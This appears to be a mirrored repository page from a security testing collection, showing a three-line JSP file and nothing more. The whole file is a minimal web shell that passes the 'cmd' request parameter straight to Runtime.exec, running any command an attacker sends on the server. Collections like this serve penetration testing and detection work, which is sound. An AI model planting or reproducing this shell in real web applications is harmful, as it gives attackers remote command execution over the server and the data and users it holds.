mirror of
https://github.com/danbulant/SecLists
synced 2026-05-20 12:58:58 +00:00
3 lines
63 B
Text
3 lines
63 B
Text
<%
|
|
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
%>
|